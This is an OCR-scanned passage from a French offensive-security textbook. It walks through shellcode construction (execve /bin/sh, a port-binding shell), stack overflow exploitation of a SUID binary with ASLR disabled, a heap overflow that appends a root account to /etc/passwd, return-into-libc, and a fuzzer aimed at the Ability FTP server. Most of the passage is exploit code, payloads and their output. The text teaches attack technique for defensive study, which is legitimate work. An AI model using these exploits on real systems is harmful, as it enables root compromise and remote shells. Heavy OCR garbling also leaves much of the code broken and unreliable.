très souvent le nom d'une fonction), ESP pointe sur l'adresse de retour. La 
stack est ensuite étendue aux besoins du développeur et, une fois arrivée à 
la fin de la fonction, ESP ne pointe plus du tout sur l'adresse de retour de la 
fonction. Autrement dit : "où est l'assiette sur laquelle on doit faire pointer 
la fourchette avant le retour de la fonction étant donné que l'on a empilé x 
assiettes ?". Il faut additionner à ESP le bon nombre d'octets réservés sur la 
stack pour qu'il revienne à sa valeur d'origine, celle qui pointe sur l'adresse 
de retour de la fonction. Fastidieux si l'on doit noter chaque allocation de 
mémoire sur la stack. 


La meilleure façon de procéder est de sauvegarder ESP lorsqu'on rentre dans 
la fonction et de restaurer sa sauvegarde à la fin de la fonction. 


La sauvegarde d'ESP s'effectue par le registre EBP. Le prologue d'une fonc- 
tion consiste à sauvegarder EBP sur la pile (Push), à sauvegarder ensuite 
ESP dans EBP. L'épilogue d'une fonction restaure ESP par EBP, et rend à 
EBP sa valeur d'origine (Pop). Tout l'espace (stack frame) consommé sur la 
pile entre le prologue et l'épilogue est ainsi immédiatement libéré. Nous 
verrons plus tard comment réaliser un prologue et un épilogue en bonne et 
due forme. 
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0x0000 


Données c 

de la fonction S 

EBP 5 

pour la fonction g 

(ESP) ui 
"call — 


de la function 


Sens d'écriture 


Sens d'empilement 


EBP absolue —> 


1 
OxFFFF 


3. Bases des shellcodes 


3.1 Exemple 1 : shellcode.py 


Xor 
xor 
xor 
xor 
jmp 


eax,eax 
ebx,ebx 
ecx,ecx 
edx,edx 
short string 


code : 


pop 
mov 
mov 
mov 
int 


ecx; on place l'adresse mémoire de la phrase dans la pile 
bl,1 
dl,23 
al,4 
0x80; les quatres lignes precedentes forment le write() 
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dec bl 

mov al,1 

int 0x80; les trois lignes précedentes composent le exit() 
string 

call code 

db ‘bonjour, tout le monde! 


Pour pouvoir utiliser ce code pour une attaque de type buffer overflow, 
nous voulons le transformer en code hexadécimal. 


Pour cela, nous utilisons un programme réalisé en python qui transforme 
directement le code en hexadécimal, programme donné ci-dessous (shell- 
code.py). Pour la compréhension de ce programme, reportez-vous au livre 
de Gérarg Swinnen (http://www.cifen.ulg.ac.be/inforef/swi/python.htm). 


Il faut que le programme en assembleur soit dans le même répertoire que 


shellcode.py. 
shellcode.py : 


#!/usr/bin/env python 
import os 


file-raw input ("entrez le nom de votre programme en assembleur\n") 
filel=file.split('.') 
command="nasm "+file+" -o "+file1[0]+".0" 
os. system (command) 
command?2="ndisasm -u "+file1[0]+".o >> shelltemp" 
os. system (command2) 
fd=open ("shelltemp",'r') 
ligne="".join(fd.readline()) 
os.system("touch shellcodel") 
fl=open("shellcodel", 'w') 
while ligne: 
tp=ligne.split(" ") 
fl.write (tp{[2]) 
ligne="",.join(fd.readline()) 
fl:close () 
fl=open("shellcodel",'r') 
code=fl.read(2) 
os.system("touch shellcode") 
fc=open("shellcode", 'w') 
fc.write(r'shellcodef]=") 
while code: 
hex=r"\x"+code 
fc.write(hex) 
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code=fl.read({(2) 
ÉCHWNÉIES(E u; TS) 
fl close () 
fc.closei{) 
os.system("rm shellcodel") 
fd.close() 
os.system("rm shelltemp") 


Exemple 2 : execvel) 


Programme C : /bin/sh 


Int main(){ 
char command= ''//bin/sh ''; 
char *arg{[2]; 
arg{0]=command; 
arg{1]=0; 
execve(command,arg,0); 


} 


Pour écrire le programme en assembleur correspondant à celui en C ci- 
dessus, retournons sur le site des syscalls pour trouver comment écrire la 
fonction execve () : sys _execve(struct pt regs regs). 


Nous donnons comme argument à cette fonction la chaîne de caractères 
suivie du caractère fin de chaîne soit //bin/sh. 


CDQ - Convert Double to Quad 
Syntaxe : CDQ 


CDQ étend à 64 bits le contenu signe de [EAX]. Le résultat est renvoyé 
dans [EDX:EAX]. 


Nous mettons d'abord eax et edx à zéro. Ensuite nous créons la chaîne de 
caractères dans la pile en "pushant" eax comme la fin de chaîne et ensuite 
la chaîne //bin/sh. Nous sauvons le pointeur de la chaîne de caractère dans 
ebx. Ainsi, le premier argument est rangé. 


Maintenant que nous avons le pointeur, nous allons pouvoir créer un 
tableau dans lequel nous allons mettre eax (0, il sert à terminer le tableau), 
suivi du pointeur sur la chaîne de caractères. 
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Nous pouvons maintenant charger le pointeur vers ce tableau dans ecx que 
nous pouvons utiliser comme deuxième argument de l'appel system. 


Tous les arguments sont prêts. Nous pouvons faire appel à la commande 
system execve (deux dernières lignes). 


BITS 32 
xor eax,eax 

cdq 

push eax 

push long 0x68732f6e 
push long 0x69622f2f; les deux lignes précédentes sont le //bin/sh 
mov ebx,esp 
push eax 

push ebx 

mov ecx,esp 

mov al,0x0b 

int 0x80 


Nous pouvons maintenant transformer le programme assembleur. 
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3.3 Exemple 3 : Port Binding Shell 


Cet exploit est souvent utilisé, il ouvre un port et exécute un shell quand 
quelqu'un se connecte au port. 


Programme en C du port binding shell : 


#include<unistd.h> 
#include<sys/socket.h> 
#include<netinet/in.h> 


int 


SOC C1; 


struct sockaddr in serv addr; 


int 


Nous 


main(){ 

serv _addr.sin family=2; 

serv addr.sin addr.s addr=0; 
serv _addr.sin port=0xAAA2; 
soc=socket(2,1,0); 

bind(soc, (struct sockaddr *)&serv addr,0x10); 
listen (Soca); 
cli=accept(soc,0,0); 
dup2(cli,0); 

dup2(cli,1l); 

dup2(cli,2); 
execve(''/bin/sh'',0,0); } 


utilisons toujours ici, execve(), la différence est que nous effec- 


tuons une connexion sur un port. Pour cela, on crée un socket, on écoute 
et on accepte une connexion en lui offrant un /bin/sh. 


Cela nous donne un programme en assembleur qui ressemble à ceci. 


Port binding shell en assembleur : 


BITS 32 


xor 
xor 
cdq 


eax,eax 
ebx, ebx 


push eax 
push byte Oxl 
push byte 0x2 


mov 
inc 
mov 
int 
mov 


ecx,esp 
bl 
al,102 
0x80 
esi,eax 
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push edx 

push long OxAAAA022AA 
mov ecx,esp 

push byte 0x10 

push ecx 

push esi 

mov ecx,esp 

ine pl 

mov al,102 

int 0x80 


push edx 
push edx 
push esi 
mov ecx,esp 
inc bl 

mov al,102 
int 0x80 
mov ebx,eax 


xor ecx,ecx 
mov cl;3 

loop: 

dec cl 

mov a1l,63 

int Ox80 

jnz loop 

Push edx 

push long 0x68732f2f 
push long O0x6e69622f 
mov ebx,esp 

push edx 

push ebx 

mov ecx,esp 

mov al,0x0b 

int 0x80 
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4. Les Buffer Overflows 


4.1 Quelques définitions 


- Exploit : tirer parti d'une vulnérabilité pour que le système cible réagisse 
d'une manière autre que celle prévue. L'exploit est aussi l'outil, la suite 
d'instructions ou le code qui est utilisé pour exploiter une vulnérabilité. 

- Oday : un exploit pour une vulnérabilité qui n'a pas encore été publique- 
ment publiée, fait quelque fois référence à la vulnérabilité elle-même. 

- Fuzzer : un outil ou une application qui va envoyer à un programme, 
toute ou une partie de valeurs inattendues afin de déterminer si un bug 


existe sur ce système. 
Wikipédia nous donne cette définition pour les buffer overflow : 


« En informatique, un dépassement de tampon ou débordement de 
tampon (en anglais, buffer overflow) est un bogue causé par un processus 
qui, lors de l'écriture dans un tampon, écrit à l'extérieur de l'espace alloué 
au tampon, écrasant ainsi des informations nécessaires au processus. 


Lorsque le bogue se produit non intentionnellement, le comportement de 
l'ordinateur devient imprévisible. Il en résulte souvent un blocage du pro- 
gramme, voire de tout le système. 


Le bogue peut aussi être provoqué intentionnellement et être exploité pour 
violer la politique de sécurité d’un système. Cette technique est couram- 
ment utilisée par les pirates informatiques. La stratégie du pirate est alors 
de détourner le programme bogué en lui faisant exécuter des instructions 
qu'il a introduit dans le processus. » 


Pour bien comprendre ces définitions, il est essentiel d'avoir de bonnes 
notions de la gestion de la mémoire et de la pile mais aussi de l'exécution 
d'un programme. 
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Notions essentielles 


Quand un programme est exécuté, différents éléments (par exemple des 
variables) sont stockés en mémoire. 


Premièrement, l'OS crée des emplacements mémoire ou le programme 
pourra “tourner”. Cet emplacement mémoire inclut les instructions du pro- 


gramme actuel. 


Deuxièmement, les informations sont chargées du programme dans l'espace 

mémoire créé. 

Il existe trois types de segments dans le programme : text, .bss et .data. 

- Le text est en lecture seule tandis que le .bss et le .data sont en lec- 
ture/écriture. 

- Le data et le .bss sont réservés pour les variables globales. 

- Le data contient les données initialisées. 

- Le .bss contient les données non initialisées. 

- Le .text contient les instructions du programme. 


Finalement, la pile (stack) et le heap (partie de la mémoire interne utilisée 
pour construire ou rejeter dynamiquement des objets de données) sont 
initialisés. 

Stack : (LIFO) la donnée la plus récente placée (push) dans la pile sera la 
première sortie (pop). 

Une LIFO est idéale pour mémoriser des données transitoires ou des infor- 
mations qui n'ont pas besoin d'être stockées longtemps. 


La pile stocke les variables locales, les appels à fonction et d'autres informa- 
tions utilisées pour nettoyer la pile après qu'une fonction ou procédure ait 
été appelée. 

À chaque donnée stockée dans la pile, l'adresse contenue dans le pointeur 
de pile (ESP) décroît. 

La première chose à trouver sur une machine UNIX lors d'une attaque en 
local est un programme vulnérable, mais cela ne suffit pas. 
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Il faut injecter notre code arbitraire dans un programme qui est exécuté 
avec les droits root même s'il est appelé par un utilisateur. 


Ainsi, le pirate se trouvera avec les droits root et sera en possession d'un 
shell qui lui permettra d'exécuter n'importe quelle commande en tant que 
root. 


Comment connaître les programmes avec le suid root activé ? 
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Stack overflow 


Ce premier exemple que nous allons voir et détailler est plus un cas d'école 
qu'une application pratique. Ce type d'attaque n'est plus valable dans les 
nouveaux noyaux car maintenant la mémoire est "randomizée", c'est-à-dire 
que les adresses mémoires sont aléatoires et donc ne sont plus prévisibles. 


Pour pouvoir démontrer notre exemple, nous allons donc devoir désactiver 
le patch Linux comme ceci : 


bash-3.00# cat /proc/sys/kernel/randomize va space 

1 

bash-3.00# echo 0 > /proc/sys/kernel/randomize va space 
bash-3.00# 

bash-3.00# cat /proc/sys/kernel/randomize va space 

0 

bash-3.00# 


Nous allons prendre comme programme test celui-ci : 


#include <stdio.h> 
#include <string.h> 
#include <stdlib.h> 
int vuln(char *arg) 


{ 
char buffer{[512]; 


strcpy(buffer,arg); 
return 1; 


} 


int main(int arge; char **argv) 
{ 

if (argc<2)exit (0); 
vuln(argv{l1l); 

exit(1); 

} 


Dans le programme ci-dessus, le buffer a été déclaré avec une taille de 
512 octets. 


Les sauvegardes des registres sur la pile sont codées sur 4 octets (registres 


82 bits). 


Les deux arguments de la fonction vuln sont des adresses de buffer, ils sont 
codés sur 4 octets. 
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Si nous arrivons à écrire 4 octets de plus que la taille du buffer, alors les 
4 octets de EBP seront écrasés. 


Si nous arrivons à écrire 4 octets de plus, alors c'est EIP qui sera écrasé. 


Si EIP est écrasé par une valeur que nous aurons définie, lors de l'appel à 
ret, c'est la valeur modifiée qui sera "pop" dans la pile et sur laquelle le pro- 
gramme sautera. 


Nous risquons d'avoir un écart de 4 octets suivant la version du compila- 
teur. 


Compilons d'abord le programme, donnons-lui le droit d'exécution et acti- 


vons le bit SUID : 


kadok:/home/fasm/livres/ENI HACKING/programmes# gcc -o premier premier.c 
kadok:/home/fasm/Livres/ENI_HACKING/programmes# chmod u+s premier 
kadok:/home/fasm/livres/ENI_ HACKING/programmes# ls -l 

total 12 

-rwsr-xr-x 1 root root 6719 jun 9 15:44 premier 

-rw-r--r-- 1 root root 216 jun 9 15:43 premier.c 
kadok:/home/fasm/livres/ENI_HACKING/programmes# $ 


Nous allons pouvoir nous attaquer au buffer overflow. 


` 


La première chose à tester est la faillibilité de notre programme. Nous 
allons donc essayer d'injecter un grand nombre d'arguments en lançant 
notre programme. Si celui-ci est faillible, nous aurons en retour un 
"segment fault". 


Nous utiliserons le language python à cette fin mais vous pouvez utiliser 
perl ou tout autre language. 


Pour écrire, par exemple, un grand nombre de "A" grâce à python, nous 
ferons comme suit : 


f python -c 'print "A" ~ 1000! 
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Ce qui nous affichera 1000 fois la lettre A. 


dok:/nome/fasm/tivres/ENI_HACKINS/programmesé python -c "print ‘A ” 1009 7 
ANT Nr En A EM TE An AA 
AA AAA A AAA AAARAAARARAAAAZ AALAAAAARAAAAAAAAAAAARAAAAAAAAAAAAARAAAAAARAAAAA, BRAARARAAANAPARRARAR 
a AAARAAARARAAAAAARAARAABARARAAAAAAAA AAAAAAAARAAAAAARAAAAAAAAAA |  ARAAAAAAAAAABARAAAAAAARAAAAA AAAARARAAAARRARRARARAARAA | 
AARRARARAA AAA AAA AAA A À AAA AR AR ARAA RAA AAA AAA AA AAKA AAA AR RAR ARR RAA AR ARR AAAA AA AAAARRAA RAA AA A AAAA ARAAAARRARAAAR ARE AAA 
LANARAARA ARAAAAAS KRAAAARABAAAAAARAAAAARAAAAANA A ISERE ERP PRE TENTE AAA 


Lançons donc maintenant notre programme avec ces 1000 A : 


“Rhone -C pOr A ERa 


kadok :/home/fasm/Livres/ENI HACKING pör AMMES Rrit 
rreur de segmentation 
kadok : /home/fasm/Livres/ENT _HAGKING/programmes# LEE 


Notre programme nous donne bien une erreur de segmentation. Il est donc 
susceptible de présenter une faille de style stack overflow. Approfondissons 
notre étude. 


Il nous faut déterminer maintenant exactement pour quel nombre de 
caractères le programme plante, ceci afin de déterminer le moment où nous 
écrasons l'adresse de retour. N'oublions pas que nous ne sommes pas censés 
connaître la taille du buffer. 


Nous allons pour l'instant tester manuellement jusqu'à trouver la taille du 
buffer. Nous verrons ultérieurement comment automatiser cette recherche 
grâce à ce que l'on appelle un fuzzer. 


Pour cela, afin de visualiser le contenu de l'adresse de retour, nous allons 
lancer le programme sous un debugger, gdb sous Linux. Gdb est un debug- 
ger très complet. Nous allons juste voir les commandes utiles pour notre 
utilisation mais de nombreuses commandes sont disponibles. 
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r signifie run, nous lançons donc le programme avec les 1000 A comme 
arguments. 


Nous pouvons voir, en sortie du programme le "Segmentation fault" avec 
une adresse inconnue qui est 0x41414141. Que représente cette adresse ? 
41 en hexadécimal représente le A. Donc l'adresse de retour a été remplacée 
par quatre A. L'adresse de retour a donc bien été écrasée. 


Program received signal SIGSEGV, Segmentation fault. 
0x41414141 in ?? () 


Nous allons essayer, par tâtonnement, en visualisant cette adresse de re- 
tour, de trouver exactement le moment où nous écrasons l'adresse de 
retour. 
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Nous voyons que pour 520 À exactement, nous écrasons l'adresse de retour 
(BIP); 
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Nous allons pouvoir reconstruire notre ligne de commande pour la faire 
ressembler à la structure de la pile : 


Ī python -c ‘print "A" * 512 + "2222" + "DCBA"! 


Les ZZZ représentent le contenu de ebp et les DCBA le contenu de EIP 
dans la pile. 


Testons cette commande sous gdb : 


(gdb) r ‘python -c ‘print "A" * 512 + *ZZ22" + "DCBA"' ` 
The program being debugged has been started already. 
Start it from the beginning? (y or n) y 


tarting program: /home/fasm/Livres/ENT _HAGKING/pragramnes/prener ‘python T. 
fint "A * 512 + "7772 + "DCBA" : - 


rogram received signal SIGSEGV, A RE fault. 
x41424344 in ?? () 
(gdb) D 


Nous retrouvons à la sortie du programme le Segmentation fault avec 
une adresse de retour à 0x41424344 qui représente en ASCII ABCD. Nous 
pouvons remarquer que nous avons envoyé DCBA et l'adresse de retour est 
ABCD, ceci est du à la structure "little indian" d'Intel. 


Program received signal SIGSEGV, Segmentation fault. 
0x41424344 in ?? () 


Nous avons entièrement déterminé la structure de la pile. Il faut mainte- 
nant pouvoir injecter un shellcode dans notre buffer (nous avons assez de 
place avec les 512 octets) et faire ponter l'adresse de retour (pour l'instant 
ABCD) vers ce shellcode dans le buffer. 


Oe ea 


512 octets | 4 octets | 4 octets 
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Pour inclure notre shellcode, rien de plus simple, nous allons remplacer les 
A par le shellcode. Le reste des A sera remplacé par un NOP (no operation 
\x90) qui va nous permettre d'avoir une plage d'adresse de retour plus 
grande pour nous simplifier le travail. 


Utilisons le programme vu dans la section Exemple 3 : Port Binding Shell 
(execve.asm) et transformons-le en shellcode : 


Nous voyons que le shellcode généré ressemble à ceci : 


shellcode[]="\x31\xCO\x99\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\ 
X6E\x89\xE3\x50\x53\x89\xE1\xB0O\x0OB\xCD\x80"; 


Il fait 24 octets, nous en avons 512 dans notre buffer, nous pouvons donc 
remplacer 512 — 24, soit 488 octets par des NOP : 


python -c 'print "\x90" * 488 + "\x31\xCO\x99\x50\x68\x2F\x2F\x73\ 
X68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x53\x89\xE1\xBO\xOB\xCD\x80" + 
LI /FATAT AM + "DCBA' r 
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Testons maintenant si nous ne nous sommes pas trompés dans notre com- 
mande, nous devrions retrouver : 


| Program received signal SIGSEGV, Segmentation fault. 


0x41424344 in ?? () 


La dernière étape est de trouver une adresse de retour qui pointe vers notre 
shellcode, disons plutôt ici vers un NOP. 


Pour cela, nous allons encore utiliser gdb : 
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Nous voyons apparaître dans la mémoire des 90 qui correspondent à nos 
NOP. Le shellcode se trouve juste après nos NOP. 


Nous pouvons donc prendre n'importe quelle adresse devant les NOP. 
Nous ferons juste attention à ne pas prendre une adresse avec deux 0 suc- 
cessifs qui signifient "fin de chaîne". 


Nous allons pouvoir finaliser notre commande : 
python -c 'print "\x90" * 488 + "\x31\xCO\x99\x50\x68\x2F\x2F\x73\ 


X68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x53\x89\xE1\xBO\xOB\xCD\x80" + 
TAAA EE MN ETONREANK EE \ KDE" 


N'oubliez pas la structure little indian afin d'écrire l'adresse de retour 
(0xbffff410 devient \x10\xf4\xff\xbf). 
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Si nous lançons cette commande nous obtenons un shell sh alors que nous 
étions en bash. Nous avons donc pu détourner l'application initiale pour 
lancer ce que nous désirions. 


Nous venons de réussir notre premier buffer overflow. 


Le principe est très intéressant et permet de comprendre la structure de la 
pile et le passage d'arguments à un programme, une fonction. 


Les noyaux Linux étant maintenant tous "patchés", d'autres techniques ont 
vu le jour. 


Heap Overflow 


Les fonctions faillibles au heap overflow sont de la famille des malloc(), 
calloc(), realloc(). 


Le heap est composé de blocs de mémoire, certains sont alloués par le pro- 
gramme, d'autres sont vides. Souvent les blocs alloués sont adjacents dans 
la mémoire. 
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A=malloc(10) B=malloc(8) C=malloc(4) 


| | AAAAAAAAAA | |BBBBBBBB 


Contrôle de Contrôle de Contrôle de 
données données données 


Nous allons utiliser le programme suivant pour démontrer notre Heap 
overflow : 


#include <stdio.h> 

#include <stdlib.h> 

#include <string.h> 

int maintint argc, char *argv{)) 

{ 

FILE Éd; 

char *entreutilisateur=malloc(20); 
char *sortiefichier-=malloc(20); 


printf ("====================== =============== Ne) 
printf" heap overflow - Acissi - ENI editions\n"); 
printf (=== = \n\n" 


) 

a 

if(argc 2) 

{ 

printf("Usage: %s <la chaine va etre ecrite dans 
/tmp/eni>\n",argv{(0]); 

exit (0); 

} 

strcpy(sortiefichier,"/tmp/eni"); 
strcpy(entreutilisateur,argv{1]); 
printf("Ecriture de \"%s\" à la fin de 
%s...\n",entreutilisateur,sortiefichier); 
fd=fopen(sortiefichier,"a"); 

if (fd==NULL) 

{ 

fprintf (stderr, "impossible d'ouvrir $%s\n",sortiefichier); 
exit(l); 

} 
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fprintf(fd,"$%s\n",entreutilisateur); 
fclose (fd); 
return 0; 


} 


Après avoir compilé le programme et donné les droits d'exécution avec le 
bit SUID actif, nous obtenons pour une utilisation normale l'écriture de la 
chaîne de caractères passée en argument dans /tmp/eni. 


Que pouvons-nous tenter pour exploiter une faille de type heap overflow ? 


© Editions ENI - Toute reproduction interdite 


Les failles applicatives 
Chapitre 8 


Commençons par envoyer en argument, par exemple, un nombre de chif- 
fres croissant. 


Nous voyons que pour le troisième essai, nous avons un changement dans 
le fichier d'écriture : 


Ī Ecriture de "012345678901234567890123456789" a la fin de 456789... 
Nous pouvons déduire que si nous remplaçons les 6 derniers chiffres 


(456789) par le chemin d'un fichier, nous allons écrire à l'intérieur. Il faut 
24 caractères devant le chemin du fichier. 


Nous allons essayer d'écrire dans /etc/passwd, ce qui est théoriquement 
impossible pour un utilisateur normal. 
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Regardons le contenu de ce fichier, chaque ligne est de la forme : 


f fasm:x:1000:1000:fasm, ,, :/home/fasm:/bin/bash 


Si nous voulons ajouter une entrée à ce fichier, nous allons devoir ajouter 
une ligne telle que celle-ci : 


f rfasm::0:0:fasm:/root:/tmp/etc/passwd 


Il va donc nous falloir ramener à 24 caractères 
rfasm::0:0:fasm:/root:/tmp 


Nous avons ici 26 caractères, il suffit donc d'en retirer deux, ce qui donne : 


Hrfasm::0:0:fa:/root:/tmp 


Ajoutons cette entrée au fichier : 


asm@kadok:-/Livres/ENI HACKING/programmesé .ecrire rfasm: :0:0:fa:/root:/tmp/etc/passwd 


criture de "rfasm::0:0:fa:/root:/tmp/etc/passwd® a la fin de /etc/passwd... 
asm@kadok:-/Livres/ENT HACKING/programmes$ 


sshd:x:110:65534: : /var/run/sshd:/usr/sbin/nologin 
polkituser:x:111:120:PolicyKit,,,:/var/run/PolicyKit:/bin/false 
ftp:x:112:121:ftp daemon,,,:/srv/ftp:/bin/false 

mysql :x:113:122:MYySQL Server, ,,:/var/lib/mysql:/bin/false 
uml-net:x:114:123: :/home/uml-net:/bin/false 
rfasm::0:0:fa:/root:/tmp/etc/passwd . 


L'inconvénient majeur est qu'en lieu et place de /bin/sh, nous avons 
/tmp/etc/passwd dans le fichier passwd. 


Il nous suffit de créer un lien symbolique de /tmp/etc/passwd vers 
/bin/sh 


FaSm# mkdir /tmp/etc/ 
FaSm# ln -s /bin/sh /tmp/etc/passwd 


Nous avons donc réussi à écrire ce que nous voulions où nous voulions. 
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return into libc 


Les versions récentes des patchs noyau proposent toutes des protections 
qui interdisent une exploitation RET-into-libc simple. 


Mais elle est encore effective sur d'autres systèmes d'exploitation (Solaris) 
et sur les anciennes versions des patchs noyau Linux. 


Il existe d'autres méthodes dérivées de celle-ci qui permettent d'exploiter les 
stack overflow même avec des versions récentes de ces patchs. 


Nous allons découvrir une autre méthode plus souple pour prendre le con- 
trôle d'un programme et ce sans avoir recours à aucun shellcode. 


Il est en effet possible de retourner directement sur une fonction de la libc 
ou d'une autre bibliothèque de fonctions présente dans l'espace mémoire du 
processus attaqué afin de l'exécuter. 


Cette méthode permet de contourner les patchs rendant la pile non exécu- 
table ou encore d'exploiter des débordements impliquant de petits buffers 
(pas assez de place pour le shellcode). 


Utilisons ce programme : 


#include <string.h> 
int main( int argc, char **argv) 
{ 
char buffer[64]; 
strcpy (buffer,argv{l]); 
return(0); 


} 


Ce programme comporte une faille classique impliquant la fonction 
sStrepy ty: 
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Aucune vérification n'est faite sur la taille de argv[1]. L'appel à strcpy () 
aura pour effet de copier la chaîne sur la pile tant qu'un caractère nul ne 
sera pas rencontré. 


Lançons maintenant le debugger afin d'étudier ce programme. 
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Nous allons placer un point d'arrêt sur strcpy puis lancer le programme 
en lui donnant un nombre d'arguments assez important. 


319 
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Notre buffer fait 64 octets, à la suite de ce buffer, nous allons donc trouver 
ebp (4 octets) et après ebp, nous trouverons eip. 


Avant overflow Après overflow 


Donc, si nous entrons en argument une chaîne de caractères de plus de 
68 octets (donc pour nous 76) en argv{[1], l'appel de la fonction strcpy 
provoque un débordement de buffer en réécrivant notamment les sauvegar- 
des des registres EBP/EIP (rappels : EBP = pointeur de frame et EIP = poin- 
teur d'instructions). 
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Il nous faut donc modifier la sauvegarde du registre EIP afin de faire retour- 
ner la fonction courante (main pour nous) sur une fonction de la libc. 


Nous allons donc essayer de récupérer l'adresse de la fonction system (). 


(gdb) p system 
$1 = {<text variable, no debug info>} Oxb7ea28b0 <system> 
(gdb) p exit 

$2 = {<text variable, no debug info>} Oxb7e97b30 <exit> 


(gdb) J 


Il faudrait ensuite placer l'argument 1 de system() soit pour nous /bin/sh 
dans l'environnement : export fasm=/bin/sh 


Nous allons ensuite utiliser un programme écrit en C, assez simple, pour 
trouver l'adresse en mémoire de la nouvelle variable d'environnement. 


#include <stdio.h> 


int main(int argc; char *argv{]) 


{ 


if targe: 2) 


{ 
printf ("UTILISE UN ARGUMENT!!!"); 


exit (0); 
} 


char *addr; 
addr = getenv(argv{l]); 


if (addr != NULL) 
printf ("ss est localisé en b %p\n", argvll], 
addr) ; 


return 0; 
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fasm@serval:-/livres/ENI HACKING/programmes$ export SHELL=/bin/sh 
fasm@serval:-/livres/ENI HACKING/programmes$ ./getenv SHELL 


SHELL est localise en Oxbffff788 
fasm@serval:-/livres/ENI HACKING/prog 


Il nous reste à injecter tout cela. 


/vuln_rilc “python -c ‘print "A" * 68 + "\xb0\x28\xea\xb/" + "ABCD" + 
"\x88\xf/\xff\xbf" ' ` 


Nous nous retrouvons avec un shell sh. 


Nous venons de voir différents principes des buffer overflow. Il en existe 
beaucoup d'autres, des formats string (peut-on dire buffer overflow ?) des 
return into libc chaînés... 


Pour en terminer dans ce chapitre avec les bases des buffers overflow, nous 
allons étudier un cas réel, connu, sous Windows, ce qui nous permettra de 
nous initier aux fuzzers. 


Cas concret : Ability server 


Pour travailler sur les attaques de type buffer overflow, le mieux est d'avoir 
deux machines virtuelles (par exemple virtualbox) qui vont nous permettre 
de recréer la machine victime en local avant de faire l'attaque en réel. 


La première machine sera sous debian et la seconde, la victime, sous Win- 
dows. 


La prise d'informations sur la victime sera bien sûr faite au préalable afin 
de recréer une machine parfaitement identique. Il faut connaître l'OS utili- 
sé, la version exacte du logiciel installé qui est susceptible d'être faillible et 
savoir si un service pack a été installé. 


Pour l'exemple, la victime sera une machine avec un Windows XP, Service 
Pack 2 avec Ability Server 2.34. Vous pourrez trouver ce serveur FTP en fai- 
sant une recherche Google. 
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FUzzing 


La première chose à faire est de tester le logiciel afin de découvrir s'il est 
susceptible d'être faillible. 


Il existe pour cela des logiciels presque "clés en main" tels que fusil ou 
spike. 


Mais le but ici est de comprendre le fonctionnement d'un fuzzer, nous 
allons donc le fabriquer. 


Nous pouvons utiliser n'importe quel language, il faut savoir programmer 
des sockets (connexions à distance TCP/IP ou UDP) et connaître le proto- 
cole que l'on va attaquer, le FTP pour notre exemple. 


Le meilleur moyen pour connaître un protocole est de se procurer sa REC, 
une simple recherche Google nous aidera. 


D'après Wikipédia : « Le fuzzing est une technique pour tester des logi- 
ciels. L'idée est d'injecter des données aléatoires dans les entrées d'un pro- 
gramme. Si le programme échoue (par exemple en crashant ou en générant 
une erreur), alors il y a des défauts à corriger. » 


Nous connaissons l'adresse IP de la victime 10.0.0.3. Notre adresse IP sera 
10.0.0.2. 


Les machines virtuelles sont prêtes, nous pouvons commencer notre 
attaque. 


Voici le programme en Python : 


#!/usr/bin/python 
import socket 
buffer=["A"] 
counter=20 
while len(buffer) <= 100: 
buffer.append("A"*counter) 
counter=counter+20 
commands=[{"MKD", "CWD", "STOR"] 
for command in commands: 
for string in buffer: 
print “Fon teste s” + command + ":" +str(len(string)) 
s=socket.socket (socket.AF INET, socket.SOCK STREAM) 
connect=s.connect (('10.0.0.2',21)) 
s.recv(1024) 


323 


324 


Sécurité informatique 


Apprendre l'attaque pour mieux se défendre 


.send ('USER ftp\r\n!') 

.recv(1024) 

.send('PASS ftp\r\n') 

.recv(1024) 

.send (command + '! " + string + '\r\n') 
.recv(1024) 

.send('QUIT\r\n') 

.close () 


U U U U U U U UW 


Que fait ce programme ? 


Nous créons tout d'abord une liste de A allant de 20 en 20 qui va nous ser- 
vir d'arguments par la suite. 


Nous mettrons ces arguments derrière trois commandes qui admettent des 
arguments, MKD, CWD, STOR. Il nous faut maintenant envoyer ces com- 
mandes. Nous créons donc un socket et nous nous connectons sur le ser- 
veur. Il nous faut alors nous identifier. Nous avons bien sûr un accès res- 
treint sur ce serveur, le login étant ftp et le mot de passe ftp. 


Les commandes sont USER ftp puis PASS ftp et nous pouvons enfin 
envoyer nos commandes avec nos arguments. Nous fermons enfin le 
socket. 


- Fa (6: debian fan fanctionl- VirtualBox OSE — 
fschine Périphériques Alde 


Abiy Server 2 34: No news available. 


Ability Server 


Tiy où more advanced FTF Server and Mad Server vues code-craftess com 


+ HITP Server 


Echier Éduicn Affichage Ierminal Onglets &ide 
on teste: STOR528 
on teste:STOR540 
fon teste:STOR568 
“on teste:STOR58O 


Dire. Acivde f Seting 


Emad Server 
Î Ofiine 


HE Server - 
f Onre, 1 connecbons. 228 Kb n and 64 Kb out 


fon teste:STOR660 | 
on teste:STOR68O 
Mon teste:STOR798 H 
on teste:STOR729 
on teste:STOR748 
on teste:STOR760 
on teste:STOR788 
on teste:STOR880 
on teste:STORG26 H 
on teste:STORB40 H 
on teste:STORB68 | 
H 
H 


Ability Sesver.exe a renconlié un problème et doit fermer. + 
Hous vous prions de nous excuser pour le désagrément 
encouru. peses 
Si vou: étiez en kan d'electues un taval en court. les romatianssur 
VOA h svale? PAU EL yoa été perdues 


Veudlez 2nales ce problèmes à Microzolt. 
Hes gam séé uni appot demus Que vous parez nous awaye, tious 
tažerons cer appot créderéseent et anansrresnenk. 


on teste:STORBS8 
on teste:STOR960 


on teste:STOR928 
on teste:STOR948 
on teste:STOR968 


Poux afficher les données de ce appart daneus. Cliquez ci 


Less] 
Eora pps dé [teste] 
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Nous voyons sur la capture d'écran que le fuzzer envoie les commandes 
jusqu'à ce que le serveur ftp plante et nous voyons que le fuzzer s'arrête 
sur 960 arguments avec la commande STOR. 


Nous pourrions maintenant réitérer notre programme en affinant l'envoi 
des arguments (par exemple par pas de 1 de 930 à 990 arguments avec la 
commande STOR uniquement). 


Nous venons donc de voir le principe d'un fuzzer assez simple. Il nous faut 
maintenant exploiter cette faille. 


Exploitation 


Il nous faut connaître les 4 octets qui vont écraser EIP. Nous allons pour 
cela essayer d'envoyer des arguments uniques pour connaître exactement le 
nombre d'octets pour écraser EIP. 


Voiciun programme Python qui va nous aider à générer cela : 


import sys 
import string 


def usage (): 


print "Usage: ", sys.argv{[0], " <nombre> [string]" 

print" <nombre> est la taille du buffer à générer." 

print " [string] chaîne de caractère optionnelle à 
rechercher dans le buffer." 

pring 4u 

print " ISi [string] est trouvé, le buffer n'est pas affiché 

mais juste sa position" 

